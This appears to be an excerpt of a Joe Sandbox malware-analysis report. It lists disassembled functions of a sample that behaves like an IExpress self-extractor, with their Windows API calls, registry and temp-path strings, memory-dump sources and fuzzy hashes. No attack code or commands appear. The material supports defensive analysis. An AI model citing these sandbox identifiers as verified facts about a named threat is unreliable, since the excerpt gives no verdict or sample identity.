                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00622A6F
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: CharUpperA.USER32(AE0315E4,00000000,00000000,00000000), ref: 006227A8
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: CharNextA.USER32(?), ref: 006227B5
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: CharNextA.USER32(00000000), ref: 006227BC
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00622829
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: RegQueryValueExA.ADVAPI32(?,00621140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00622852
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00622870
                                                                                                                                                                                                                                                              • Part of subcall function 00622773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 006228A0
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00623938,?,?,?,?,-00000005), ref: 00622958
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00622969
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00622A21
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00622A81
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                            • String ID: 89b
                                                                                                                                                                                                                                                            • API String ID: 3949799724-2013389044
                                                                                                                                                                                                                                                            • Opcode ID: 14de90456bddbfae09b060f5552b23323cc5293efe530fe5bd9360b44cd7a59f
                                                                                                                                                                                                                                                            • Instruction ID: ca69fd50ec3022cddc0d85c295cc7203e509f45872bdada0aef0c23c3e0a38b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14de90456bddbfae09b060f5552b23323cc5293efe530fe5bd9360b44cd7a59f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB513B71D0062AEBCB21CF99E895AEEBBB6FF48700F14412AE901E3711D7319941CF95
                                                                                                                                                                                                                                                            Function 006243D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 006243F1
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0062440B
                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00624423
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0062442E
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0062443A
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00624447
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 006244A2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                                            • Opcode ID: 64aef1929c4ad73f8dfc70bcc1a31b322f891eedf1582e31c71bad9e06769bca
                                                                                                                                                                                                                                                            • Instruction ID: 056eabb7078ba39e990c90236c2287fcff634c4a72c306b1484971df92d8442e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64aef1929c4ad73f8dfc70bcc1a31b322f891eedf1582e31c71bad9e06769bca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01314D32E00519AFCB14DFF8DD899EEBBB6EB89310F155169F805F7240DA706C068B61
                                                                                                                                                                                                                                                            Function 00626298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062171E: _vsnprintf.MSVCRT ref: 00621750
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,006251CA,00000004,00000024,00622F71,?,00000002,00000000), ref: 006262CD
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,006251CA,00000004,00000024,00622F71,?,00000002,00000000), ref: 006262D4
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,006251CA,00000004,00000024,00622F71,?,00000002,00000000), ref: 0062631B
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00626345
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,006251CA,00000004,00000024,00622F71,?,00000002,00000000), ref: 00626357
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                            • Opcode ID: 2848b8ea326576b2cc74eec3137e5b34e84ae1a3ac06ad18aef2a00cd71dee92
                                                                                                                                                                                                                                                            • Instruction ID: 277c251b98ae8f6fb477af89147ab53e1bdd447e8907eb459c6e541c54081592
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2848b8ea326576b2cc74eec3137e5b34e84ae1a3ac06ad18aef2a00cd71dee92
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C21F671A00A29AFDB20DFA4EC499FE7B7AFB49714B101119F902A3241DB759D028FE4
                                                                                                                                                                                                                                                            Function 0062681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0062686E
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 006268A7
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 006268CC
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00621140,00000000,?,?,?), ref: 006268F4
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00626902
                                                                                                                                                                                                                                                              • Part of subcall function 006266F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0062691A), ref: 00626741
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 006268C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                            • Opcode ID: 91320d0f33b45c95e81375c80228d116112bc03fef51f60050b98860cc995ced
                                                                                                                                                                                                                                                            • Instruction ID: 2d5a5cca68625aecd5b4a060551ef38fe7a111b8fbd7cd8a9cdb8ae37dfb21a6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91320d0f33b45c95e81375c80228d116112bc03fef51f60050b98860cc995ced
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE31A031E01A299FDB30CF51EC05BEAB77AEB41728F0001A5F94DA2240DB709E968F52
                                                                                                                                                                                                                                                            Function 006224E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00622506
                                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0062252C
                                                                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000040), ref: 0062253B
                                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0062254C
                                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00622555
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                            • Opcode ID: c10a1a705f2a02a1b7e7f96d58e6c660f86f1445e286b0760df6955df853a755
                                                                                                                                                                                                                                                            • Instruction ID: 629cde7b9d59355a7a28cc0671b5a0bf9efe26a2ca3b11741873ab873263fceb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c10a1a705f2a02a1b7e7f96d58e6c660f86f1445e286b0760df6955df853a755
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA0192326019286BC7309BA5EC09EDB7B7EEB45764F000155FA49D3290DAB48E868A95
                                                                                                                                                                                                                                                            Function 006236EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00623723
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 006239C3
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,valid,00000030), ref: 006239F1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                            • String ID: 3$valid
                                                                                                                                                                                                                                                            • API String ID: 2519184315-3539985779
                                                                                                                                                                                                                                                            • Opcode ID: f9f782f71a4f727a19f1df9c4baf70d724f73889b4c04e4eb7dc410baeaebe32
                                                                                                                                                                                                                                                            • Instruction ID: 206259d490db5e7219131aa7f3e81ed8d42621b4b45fe888673f052566764102
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f782f71a4f727a19f1df9c4baf70d724f73889b4c04e4eb7dc410baeaebe32
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E591D271E01A359FEB748E15ED817EA77B3AB85304F1540A9D8899B381DB788F82CF41
                                                                                                                                                                                                                                                            Function 00626517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00620000,000007D6,00000005), ref: 0062652A
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00620000,00000000,?,?,00622EE8,00000000,006219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00626538
                                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00620000,00000000,00000547,006219E0,00000000), ref: 00626557
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00622EE8,00000000,006219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00626560
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                            • String ID: .b
                                                                                                                                                                                                                                                            • API String ID: 1214682469-1284152772
                                                                                                                                                                                                                                                            • Opcode ID: ffccbadad889ceb85b8f53820c82524ebfca3186ec7c7d28cb1d446fd9e2f655
                                                                                                                                                                                                                                                            • Instruction ID: 678977ee91de8019b64db1666c2258bee76c6fe70cf29cced02ad873112f35a8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffccbadad889ceb85b8f53820c82524ebfca3186ec7c7d28cb1d446fd9e2f655
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A901DB72500E25BBDB205FA9EC48DFB766EEB85761F000119FE10A3250D7B18D218BB5
                                                                                                                                                                                                                                                            Function 00626495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 006264DF
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 006264F9
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00626502
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                                            • API String ID: 438848745-875882553
                                                                                                                                                                                                                                                            • Opcode ID: 31bc3824ffad72aaa789bc0069a9950a23d1bce7becae1b9fdf861a6e335d812
                                                                                                                                                                                                                                                            • Instruction ID: 53870aa9a9f9b6f9c8038ab6d6c11ab10acd9bbe37912da63f6479880357c183
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31bc3824ffad72aaa789bc0069a9950a23d1bce7becae1b9fdf861a6e335d812
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC0126306049189BD760DBA0EC49FEA733ADBA4314F400198F485A61C0CFB09E8ACF11
                                                                                                                                                                                                                                                            Function 00627155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00627182
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00627191
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0062719A
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 006271A3
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 006271B8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                                            • Opcode ID: adeddfa2974ec196b7979c88fa0f1c44cda2a918310eb7b92ec45c801b6fb911
                                                                                                                                                                                                                                                            • Instruction ID: 51c203b5bdcb790bf73408dfe60cb964b1f7b04c0ed62c6cd96c3618400d804a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adeddfa2974ec196b7979c88fa0f1c44cda2a918310eb7b92ec45c801b6fb911
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25112871D01A189FCB20DFF8EA48A9EB7F6EF08320F655855D801E7210EB309A158F45
                                                                                                                                                                                                                                                            Function 006219E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00621A18
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00621A24
                                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00621A4F
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00621A62
                                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00621A6A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                                            • Opcode ID: 0810c8589aa28214d0920560e13a1b5a6351d059550e85f0147e46307517973f
                                                                                                                                                                                                                                                            • Instruction ID: b663090281573583cac7341ec5304faa9f151f746721506e5596ac7060afe749
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0810c8589aa28214d0920560e13a1b5a6351d059550e85f0147e46307517973f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED11E5315019199FCB20EF64EE0DAAE77BAEF59310F008155F91297190CA709E12CF95
                                                                                                                                                                                                                                                            Function 006247E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00624E6F), ref: 006247EA
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00624823
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00624847
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00624851
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                            • API String ID: 359063898-3647970563
                                                                                                                                                                                                                                                            • Opcode ID: b57be68e44a7c096d6f61ceae4322556927e849bccb6252a1c98884425afaa55
                                                                                                                                                                                                                                                            • Instruction ID: 5b199dc87aac25275f366554d1b37942c871ecd9344ecc60920549a36985e182
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b57be68e44a7c096d6f61ceae4322556927e849bccb6252a1c98884425afaa55
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9110279604E516FD7649F24AC18FB63B9BEBC5350F049519EE829B341DE39CC078A60
                                                                                                                                                                                                                                                            Function 00624980 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 62stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00008000,*MEMCAB,00000000,CABINET,?,00624F67,*MEMCAB,00008000,00000180), ref: 006249CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
